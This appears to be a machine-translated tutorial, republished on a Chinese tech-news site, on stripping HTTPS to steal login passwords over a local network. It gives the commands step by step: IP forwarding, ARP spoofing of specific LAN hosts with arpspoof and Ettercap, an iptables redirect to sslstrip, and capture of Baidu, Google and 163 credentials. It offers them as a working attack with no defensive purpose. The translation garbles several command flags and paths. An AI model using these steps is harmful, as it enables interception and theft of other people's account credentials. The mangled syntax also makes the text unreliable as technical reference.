Shulou(Shulou.com)06/01 Report--

* Review

SSLstrip + EtterCap middleman * converts https to http to obtain account password.

In the Linux environment, we use iptables to filter data packets, and then use sslstrip to listen to the port to get data.

Packet forwarding echo 1 > / pro/sys/net/ipv4/ip_forward

Then turn on the iptables function of Ettercap

Get rid of the notes

Try an arp spoofing to test https without using sslstrip

Arpspoof-I-eth0-t 192.168.1.102 192.168.1.2

Ok

Iptables-t nat-A PREROUTING-p tcp-- destination-port 80-j REDIRECT-- to-port 10000

Certain foundation of NAT

-T matching table NAT table: PREROUTING modified package

OUTPUT modifies the local packet before routing

POSTROUTING modifies the package to be sent

-A means to add advanced options

-P protocol type

-J indicates that the packet of the target port 80 is transferred to another port. The appeal command is port 10000.

Turn on ETTERCAP

Ettercap-T-Q-I eth0

Baidu logging in to http works well.

Listening to the data.

Log in to google

It was found that Catton could not pass in https

Turn on sslstrip

When logging in to google, https becomes http.

Log in successfully

Listening to the account password

Baidu's

Login of 163

The jump of http

The Internet speed is too slow.

In addition to using arpspoof, you can also use

Ettercap-T-Q-M arp:remote / 192.168.1.101 / /

The principle of arp deception is the same.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.